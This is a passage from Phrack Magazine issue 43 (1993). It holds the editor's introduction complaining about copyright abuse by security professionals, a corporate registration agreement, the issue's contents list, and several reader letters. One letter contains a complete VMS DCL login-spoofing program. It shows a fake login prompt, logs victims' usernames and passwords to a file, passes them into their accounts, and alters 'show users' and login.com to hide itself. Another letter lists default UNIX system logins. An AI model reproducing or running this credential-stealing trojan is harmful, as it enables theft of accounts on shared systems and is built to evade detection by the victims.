==Phrack Magazine== Volume Four, Issue Forty-Three, File 1 of 27 Issue 43 Index ___________________ P H R A C K 4 3 July 1, 1993 ___________________ ~ finger whitehouse.gov and make a secret service agent come ~ Well, here it is: Phrack 43. This issue should really piss every security professional off. Well, actually, none of them should ever see it because only two people have registered their subscriptions. But, then again I think we all know that the whole world is FULL of lying, thieving people who just don't care about other people's property. No, smarty, not hackers...computer professionals! CASE 1: The Computer Emergency Response Team. Bastions of life, liberty and the pursuit of happiness. CERT had been on the Phrack mailing list previously, and was sent a copy of 42 (as was everyone) to give them the opportunity to subscribe. Rather than do the right thing and let us at Phrack know that they were not interested in paying, and to take their name off the list, Ed DiHart instead forwarded off several copies to his cronies. Luckily for us, Ed is not the best typist, and the mail bounced all the way back to Phrack. I called Ed and asked him why he would do such a thing, which was clearly a direct violation of US Copyright Law. Ed claimed he didn't know of any new rules for Phrack, and that he had always forwarded off a few copies to his pals. I told Ed that this practice was unacceptable and that if he wanted to continue to get Phrack he and his pals would all have to register their subscriptions. Ed said that he did not want to pay and to take CERT off the list. A month prior to this Ed had said to me at the Computers, Freedom & Privacy conference in San Francisco, "Why are YOU here anyway? It sure is IRONIC that someone whose goal in life was to invade other people's privacy would be attending a conference on protecting privacy." I walked away from him in disgust. While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC that an organization such as CERT, whose main goal is to help protect the property of others would so flagrantly violate US Copyright law and completely disregard someone's property rights." Man, did that feel great! CASE 2: BT Tymnet. Dale Drew, security guru, made the statement on IRC about Phrack, "I have absolutely no desire to pay for anything having to do with hackers." Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com) logged into Len Rose's machine and ftp'd Phrack 42. With prior knowledge Phrack was not free, he willingly used company property to commit a crime. At most companies, that is grounds for termination. Luckily for Dale Tymnet doesn't give a shit. In fact, Dale several times since has gone back on IRC stating, "People here are Tymnet are kind of upset about Phrack 42." This just shows that people at Tymnet are just as criminal as they say hackers are. Since they could care less about MY property, then why should I care about theirs? Maybe I should print a list of all Tymnet internal NUIs! Well, two wrongs won't make a right, so I better not. I did, however, send email to Dale stating that we were aware of Tymnet's transgressions and that we may be forced to take legal action. I have decided to offer BT a sweet deal on a company-wide site license. We shall see if they take me up on this offer, or continue to steal Phrack. CASE 3: Gail Thackeray. A woman sworn by the court to uphold the laws of the land. This woman had the audacity to tell me that unless I enforced my copyright, it was worthless. Unless I enforce it. What the hell does that mean? Am I supposed to raid companies myself and go dig for evidence that they have stolen my information? Geez...it's not like I'm Bellcore. Gail's disgusting interpretation of the law, that unless you are big enough to stand up for yourself then you have no recourse, is a festering sore on the face of the American Legal system and I personally am appalled that this woman is allowed to act as a law enforcement professional. Oh well, as you can tell I've had a little fun with all this. And I have effectively proven my point. Security people, corporate professionals, and law enforcement types are just as unscrupulous and unethical as they have always claimed that we are. Only TWO PEOPLE within the computer/legal/security profession have the right to receive and keep copies of Phrack. Winn Schwartau, and a man at Mitre. It's amazing that they are the only ones with any scruples, isn't it? Well, let's get on with the issue. This one is pure, unadulterated evil. Only the strong will survive this time. We've got Cellular, we've got Novell, we've got 5e, we've got PHRACK TRIVIA! Get comfortable, grab your favorite intoxicant, and enjoy. *NOTES* Some of you will recognize the 5ESS file from the Summer issue of 2600 magazine. This file was sent to both myself and E. Goldstein. I was told by the author that 2600 was not printing it. Wrong. Well, we got permission from 2600 to print it here too since its such a good file, and since I spent like 8 hours dealing with the author correcting and editing it. In the future gang, if you send something to Phrack AND to 2600, TELL US BEFOREHAND! The last thing I want to hear is, "Phrack is plagiarizing 2600...gawd they are so lame." The acronym file, you will note, is DIFFERENT. Heh. In addition to the above, you may notice that we were a bit late in distributing this issue. As many of you saw through the "resubscribe" blurb sent over the mailing list, Phrack is not going through Stormking.COM any longer. The struggle to relocate put us into further delays but I've managed to take care of securing a new distribution site. We want to thank everyone at Stormking for shipping Phrack out for so long, and wish them the best in their future endeavors. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : OMAR News : Datastream Cowboy Photography : dFx Pornography : Stagliano Prison Consultant : Co / Dec The Baddest : Dolomite Rad Book : Snow Crash Reasons Why I Am The Way I Am : Hoffman, Hammett, The Power Computer Typist : Minor Threat Future Movie Star : Weevil SCon Acid Casualty : Weevil Thanks To : Robert Clark, Co/Dec, Spy Ace, Lex Luthor Phreak Accident, Madjus, Frosty, Synapse, Hawkwind Firm G.R.A.S.P., Aleph One, Len Rose, Seven-Up Computer Crime Laboratories "If you can take the bag off of your own head, then you haven't had enough nitrous." -- KevinTX Phrack Magazine V. 4, #43, July 1, 1993. ISSN 1068-1035 Contents Copyright (C) 1993 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.netsys.com (Phrack FTP Site) /pub/phrack phrack@well.sf.ca.us (Phrack E-mail Address) Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.1 mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 43 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 24K 2. Phrack Loopback Part I 38K 3. Phrack Loopback Part II / Editorial 44K 4. Line Noise Part I 39K 5. Line Noise Part II 43K 6. Phrack Pro-Phile on Doctor Who 15K 7. Conference News Part I by Various Sources 53K 8. Conference News Part II by Various Sources 58K 9. How To Hack Blackjack (Part I) by Lex Luthor 52K 10. How To Hack Blackjack (Part II) by Lex Luthor 50K 11. Help for Verifying Novell Security by Phrack Staff 48K 12. My Bust (Part I) by Robert Clark 56K 13. My Bust (Part II) by Robert Clark 55K 14. Playing Hide and Seek, Unix Style by Phrack Accident 31K 15. Physical Access and Theft of PBX Systems by Co/Dec 28K 16. Guide to the 5ESS by Firm G.R.A.S.P. 63K 17. Cellular Info by Madjus (N.O.D.) 47K 18. LODCOM BBS Archive Information 24K 19. LODCOM Sample Messages 52K 20. Step By Step Guide To Stealing a Camaro by Spy Ace 21K 21. Acronyms Part I by Firm G.R.A.S.P. 50K 22. Acronyms Part II by Firm G.R.A.S.P. 51K 23. Acronyms Part III by Firm G.R.A.S.P. 45K 24. Acronyms Part IV by Firm G.R.A.S.P. 52K 25. Acronyms Part V by Firm G.R.A.S.P. 46K 26. International Scene by Various Sources 51K 27. Phrack World News by Datastream Cowboy 24K Total: 1152K Another reason why the future is wireless. "The CTIA recommended that the FCC require the microprocessor chip be difficult to detach from the circuit board in order to prevent its removal and replacement or reprogramming." (Cellular Marketing, p. 18, May 1993) "Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!" (Anonymous hacker-type, Tumbled Cellphone Call, 1993) _______________________________________________________________________________ ==Phrack Magazine== Volume Four, Issue Forty-Three, File 2 of 27 Phrack Loopback Part I **************************************************************************** COMING NEXT ISSUE Van Eck Info (Theory & Practice) More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming) HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!) Neato Plans For Evil Devices Gail Thackeray Gifs *********************************** M A I L ********************************* Chris, Craig Neidorf gave me these addresses as ways to reach you. He tells me that you are currently editing Phrack. I hope you are well. Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our IUP connection, was charging us an extra $1,000 per month. They did some investigation at my request. We determined that Phrack traffic alone was responsible for over 40% of the total bytes transferred from the site over the past year or so. This is several gigabytes per month. All in all, the CuD archive, which contains Phrack, CuD, and other publications accounts for 85% of our total traffic. All of the email to and from EFF, Usenet traffic, and other FTP (from the EFF archive, the CAF archive, and others) constitutes about 15%. EFF isn't going to be able to carry it any more because it is effectively costing us $1,000 per month. The fundamental problem is that Phrack is so popular (at least as a free good) to cause real expense in transmission costs. Ultimately the users are going to have to pay the costs because bandwidth (when measures in gigabytes anyway) isn't free. The 12K per year it costs us to carry Phrack is not something which EFF can justify in its budget. I'm sure you can understand this. On July 1, eff.org moves from Cambridge to Washington, DC which is when I expect we will stop carrying it. I wanted to raise this issue now to let you know in advance of this happening. I have also asked Chris and Helen to talk to Brendan Kehoe, who actually maintains the archive, to see whether there is anything we can do to help find another site for Phrack or make any other arrangement which will result in less loss of service. Mitch ------------------------------------------------------------------------------ Mitchell Kapor, Electronic Frontier Foundation Note permanent new email address for all correspondence as of 6/1/93 mkapor@kei.com [Editor: Well, all things must come to an end. Looks like EFF's move to Washington is leaving behind lots of bad memories, and looking forward to a happy life in the hotbed of American politics. We wish them good luck. We also encourage everyone to join.........CPSR. In all fairness, I did ask Mitch more detail about the specifics of the cost, and he explained that EFF was paying flat rate for a fractional T-1, and whenever they went over their allotted bandwidth, they were billed above and beyond the flat rate. Oh well. Thank GOD for Len Rose. Phrack now has a new home at ftp.netsys.com.] **************************************************************************** I'm having a really hard time finding a lead to the Information America Network. I am writing you guys as a last resort. Could you point me in the right direction? Maybe an access number or something? Thanks you very much. [Editor: You can reach Information America voice at 404-892-1800. They will be more than happy to send you loads of info.] **************************************************************************** To whom it may concern: This is a submission to the next issue of phrack...thanks for the great 'zine! ----------------------------cut here------------------------------- Greetings Furds: Have you ever wanted to impress one of those BBS-babes with your astounding knowledge of board tricks? Well *NOW* you can! Be the life of the party! Gain and influence friends! Irritate SysOps! Attain the worship and admiration of your online pals. Searchlight BBS systems (like many other software packages) have internal strings to display user information in messages/posts and the like. They are as follows (tested on Searchlight BBS System v2.25D): \%A = displays user's access level \%B = displays baud rate connected at \%C = unknown \%F = unknown \%G = displays graphics status \%K = displays user's first name \%L = displays system time \%M = displays user's time left on system \%N = displays user's name in format: First Last \%O = times left to call "today" \%P = unknown \%S = displays line/node number and BBS name \%T = displays user's time limit \%U = displays user's name in format: FIRST_LAST All you gotta do is slam the string somewhere in the middle of a post or something and the value will be inserted for the reader to see. Example: Hey there chump, I mean \%K, you better you better UL or log off of \%S...you leach too damn many files..you got \%M mins left to upload some new porn GIFs or face bodily harm and mutilation!. ---------------------------- Have phun! Inf0rmati0n Surfer (& Dr. Cloakenstein) SysOp Cranial Manifestations vBBS [Editor: Ya know, once a LONG LONG time ago, I got on a BBS and while reading messages noticed that a large amount of messages seemed to be directed at ME!!# It took me about 10 minutes to figure it out, but BOY WAS I MAD! Then I added my own \%U message for the next hapless fool. :) BIG FUN!] **************************************************************************** -(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)- SotMESC The US SotMESC Chapter is offering Scholarships for the 1993 school term. Entries should be single-spaced paragraphs, Double-spacing between paragraphs. The subject should center on an aspect of the Computer Culture and be between 20-30 pages long. Send entries to: SotMESC PO Box 573 Long Beach, MS 39560 All entries submitted will become the property of the SotMESC -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()- **************************************************************************** The Southwest Netrunner's League's ----------------------------------------------------------------- WareZ RoDeNtZ Guide to UNIX!!!! ----------------------------------------------------------------- Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas) Assists by:SysCon XIV (The Ma'Bell Rapist) Iron Man MK 4a (Things that make ya go boom) This file begs to be folded, spindeled,and mutilated. No Rights Reserved@1993 ----------------------------------------------------------------- Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu Coming this September.... Shadowland, 68020... Watch this space. ----------------------------------------------------------------- Part I(Basic commands) Phile Commands: ls=List Philes more,page=Display Phile on Yo Terminal cp=Copy Phile mv=Move or Remove Philes rm=Remove Philes Editor Commnds: vi=Screen Editor Dirtory cmmnds: dir=Prints Directory mkdir=Makes a new Directory(also a VERY bad bug) rmdir=Remove a Directory pwd=print working directory Misc. Commands: apropos=Locate commands by keyword lookup. whatis=Display command description. man=Displays manual pages online. cal=Prints calendar date=Prints the time and date. who=Prints out every one who is logged in (Well, almost everyone 7:^] ) --------------------------------------------------------------- Part II(Security(UNIX security, another OXYMORON 7:^] )) If you are a useless wAReZ r0dEnT who wants to try to Netrun a UNIX system, try these logins.... root unmountsys setup makefsys sysadm powerdown mountfsys checkfsys All I can help ya with on da passwords iz ta give you some simple guidelines on how they are put together.... 6-8 characters 6-8 characters 1 character is a special character (exmpl:# ! ' & *) ----------------------------------------------------------------- Well thats all fo' now tune in next time, same Hack-time same Hack-channel!!! THE TECHNOMANCER I have taken all knowledge af604@FreeNet.hsc.colorado.edu to be my province -- Technomancer Southwest Netrunner's League ***************************************************************** [Editor: This is an example of what NOT to send to Phrack. This is probably the worst piece of garbage I've received, so I had to print it. I can only hope that it's a private joke that I just don't get. Uh, please don't try to write something worse and submit it hoping to have it singled out as the next "worst," since I'll just ignore it.] **************************************************************************** Dear Phrack, I was looking through Phrack 42 and noticed the letters about password stealers. It just so happened that the same day I had gotten extremely busted for a program which was infinitely more indetectible. Such is life. I got off pretty well being an innocent looking female so it's no biggie. Anyway, I deleted the program the same day because all I could think was "Shit, I'm fucked". I rewrote a new and improved version, and decided to submit it. The basic advantages of this decoy are that a) there is no login failure before the user enters his or her account, and b) the program defines the show users command for the user so that when they do show users, the fact that they are running out of another account doesn't register on their screen. There are a couple holes in this program that you should probably be aware of. Neither of these can kick the user back into the account that the program is running from, so that's no problem, but the program can still be detected. (So basically, don't run it out of your own account... except for maybe once...to get a new account to run it out of) First, once the user has logged into their account (out of your program of course) hitting control_y twice in a row will cause the terminal to inquire if they are doing this to terminate the session on the remote node. Oops. It's really no problem though, because most users wouldn't even know what this meant. The other problem is that, if the user for some strange reason redefines show: $show == "" then the show users screen will no longer eliminate the fact that the account is set host out of another. That's not a big deal either, however, because not many people would sit around randomly deciding to redefine show. The reason I was caught was that I (not even knowing the word "hacker" until about a month ago) was dumb enough to let all my friends know about the program and how it worked. The word got spread to redefine show, and that's what happened. The decoy was caught and traced to me. Enough BS...here's the program. Sorry...no UNIX...just VMS. Lady Shade I wrote the code...but I got so many ideas from my buddies: Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice ------------------------------------------------ $if p1 .eqs. "SHOW" then goto show $sfile = "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! The role of the dummy file in this program is to tell if the program !!!! !!!! is being used as a decoy or as a substitute login for the victim. It !!!! !!!! does not stay in your directory after program termination. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $sfile = f$search("sys$system:[ZJABAD_X]dummy.txt") $if sfile .nes. "" then goto other $open/write io user.dat $close io $open/write dummy instaar_device:[miller_g]dummy.txt $close dummy $wo == "write sys$output" $line = "" $user = "" $pass = "" $a$ = "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! A login screen with a message informing someone of new mail wouldnt !!!! !!!! be too cool... !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $set broadcast=nomail $set message/noidenficitaion/noseverity/nofacility/notext $on error then goto outer $!on control_y then goto inner $wo " [H [2J" $wo "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! insert a fake logout screen here !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $wo " ZJABAD_X logged out at ", f$time() $wo " [2A" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! This is the main body of the program. It simulates the system login !!!! !!!! screen. It also grabs the username and password and sticks them in !!!! !!!! a file called user.dat !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $outer: $set term/noecho $inquire a$/nopun "" $inquire a$/nopun "" $set term/echo $c = 0 $c1 = 0 $c2 = 0 $inner: $c2 = c2 + 1 $if c2 .eqs. 5 then goto speedup $c = c + 1 $if c .eqs. 15 then goto fail $if c1 .eqs. 3 then goto fail3 $user = "a" $wo "Username: " $from_speedup: $set term/uppercase $wo " [2A" $read/time_out=10/prompt=" [9C " sys$command user $if user .eqs. "a" then goto timeout $set term/nouppercase $if user .eqs. "" then goto inner $set term/noecho $inquire pass "Password" $set term/echo $if user .eqs. "ME" then goto done $if pass .eqs. "" then goto fail $open/append io user.dat $write io user + " " + pass $close io !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! Sends the user into their account !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $open/write io set.com $write io "$set host 0" $write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT" $write io pass $close io $@set !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! Control has been returned to your account !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $write io " [2A" $goto outer !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! Simulates a failure if the password is null, and also if the !!!! !!!! username prompt has cycled through 15 times... This is what !!!! !!!! the system login screen does. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $fail: $c = 1 $c1 = c1 + 1 $wo "User authorization failure" $wo " [1A" $goto inner !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! After the third failure, the system usually sends the screen back !!!! !!!! one step...this just handles that. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $fail3: $wo " [2A" $goto outer !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! The system keeps a timeout check in the login. If a username is not !!!! !!!! entered quickly enough, the timeout message is activated !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $timeout: $set term/nouppercase $wo "Error reading command input" $wo "Timeout period expired" $wo " [2A" $goto outer !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! There is a feature in this program which sets the terminal to !!!! !!!! uppercase for the input of a username. This is wonderful for !!!! !!!! preventing program detection, but it does cause a problem. It slows !!!! !!!! the screen down, which looks suspicious. So, in the case where a !!!! !!!! user walks up tot he terminal and holds the return key down for a !!!! !!!! bit before typing in their username, this section speeds up the run !!!! !!!! considerably. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $speedup: $set term/nouppercase $fast_loop: $user = "a" $read/time_out=1/prompt="Username: " sys$command io $if user .eqs. "a" then goto from_speedup $goto fast_loop !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! This section is optional. There are many ways that you can implement !!!! !!!! to break out of the program when you think you have gotten enough !!!! !!!! passwords. 1), you can sit down at the terminal and type in a string !!!! !!!! for the username and pass which kicks you out. If this option is !!!! !!!! implemented, you should at least put in something that looks like !!!! !!!! you have just logged in, the program should not kick straight back !!!! !!!! to your command level, but rather execute your login.com. 2) You !!!! !!!! can log in to the account which is stealing the password from a !!!! !!!! different terminal and stop the process on the account which is !!!! !!!! running the program. This is much safer, and my recommandation. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $done: $set broadcast=mail $set message/facility/text/identification/severity $delete dummy.txt;* $exit !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! This section is how one covers up the fact that the account which has !!!! !!!! been stolen is running out of another. Basically, the area of the show!!!! !!!! users screen which registers this is at the far right hand side. !!!! !!!! This section first writes the show users data to a file and alters !!!! !!!! it before it is written to the screen for viewing by the user. There !!!! !!!! may exist many forms of the show users command in your system, and !!!! !!!! you may have to handle each one differently. I have written only two !!!! !!!! manipulations into this code to be used as an example. But looking !!!! !!!! at how this is preformed should be enough to allow you to write your !!!! !!!! own special cases. Notice that what happens to activate this section !!!! !!!! of the program is the computer detects the word "show" and interprets !!!! !!!! it as a procedure call. The words following show become variables !!!! !!!! passed into the program as p1, p2, etc. in the order which they !!!! !!!! were typed after the word show. Also, by incorporating a third data !!!! !!!! file into the manipulations, one can extract the terminal id for the !!!! !!!! account which the program is running out of and plug this into the !!!! !!!! place where the user's line displays his or her terminal id. Doing !!!! !!!! this is better that putting in a fake terminal id, but that is just a !!!! !!!! minor detail. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $show: $show = "" $show$ = "" $length = 0 $ch = "" $full = 0 $c = 0 $if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1' $if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull $if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users $if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit $if p3 .eqs. "" then goto fallout $goto full $fallout: $show 'p2' 'p3' $exit $ufull: $show users/full/output=users.dat $goto manipulate $full: $show$ = p3 + "/output=users.dat" $show users 'show$' $manipulate: $set message/nofacility/noseverity/notext/noidentification $open/read io1 users.dat $open/write io2 users2.dat !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! Control_y must be dealt with here. If the user did happen to controlY !!! !!!! there is a chance that the files users.dat and users2.dat could be !!! !!!! left in their directory. That is a bad thing as we are trying to !!! !!!! prevent detection :) !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $on control_y then goto aborted $user = "" $test = "" $long = "" $ch = "" $length = 0 $user = f$user() $length = f$length(user) - 2 $user = f$extract(1,length,user) $read_loop: $read/end_of_file=eof io1 line $test = f$extract(1,length,line) $ch = f$extract (length+1,1,line) $if (test .eqs. user) .and. (ch .eqs. " ") then goto change $from_change: $write io2 line $goto read_loop $eof: $close io1 $close io2 $type users2.dat $del users.dat;* $del users2.dat;* $show == "@instaar_device:[MILLER_G]findnext show" $set message/facility/text/severity/identification $exit $change: $if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)" $goto from_change $aborted: $!if f$search("users.dat") .nes. "" then close io1 $!if f$search("users.dat") .nes. "" then delete users.dat;* $!if f$search("users2.dat") .nes. "" then close io2 $!if f$search("users2.dat") .nes. "" then delete users2.dat;* $close io1 $close io2 $delete users.dat;* $delete users2.dat;* $show == "@instaar_device:[MILLER_G]findnext show" $set message/facility/text/severity/identification $exit !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! This is the section of the program which is executed in place of the !!!! !!!! users login.com. It does grab their login and execute it to prevent !!!! !!!! suspicion, but there are a couple of hidden commands which are also !!!! !!!! added. They redefine the show and sys commands so that the user can !!!! !!!! not detect that he or she is riding off of another account. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $other: $sh$ = "@instaar_device:[miller_g]findnext show" $shline = "$sh*ow ==" + sh$ $logi = "" $logi = f$search("login.com") $if logi .NES. "" then goto Ylogin $nologin: $open/write io login2.com $write io shline $close io $@login2 $delete login2.com;* $exit $ylogin: $open/write io2 login2.com $open/read io1 login.com $transfer_loop: $read/end_of_file=ready io1 line $write io2 line $goto transfer_loop $ready: $write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show"" $close io1 $close io2 $@login2 $delete login2.com;* $exit [Editor: Thanks for the letter and program. I wish I could bring myself to use a VMS and try it out. :) Always happy to get notice that somewhere out there a female reads Phrack. By the way, "innocent female" is an oxymoron.] **************************************************************************** To: Phrack Loopback. From: White Crocodile. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is really cool invention and I (sorry for egoisthic "I") with pleasure wasting time for his reading ( ex. my playboy time ). But here for some unknown reason appear equal style, and all loopback remind something medium between "relations search" [Hello Dear Phrack, I am security expert of our local area, but when I looked to output of "last" program (oh,yeah - "last" it is ...), I ocassionaly under - standed what apparently someone elite hacker penetrated into my unpassworded account! But how he knew it??? I need to talk with him! Please mail me at security@...] and 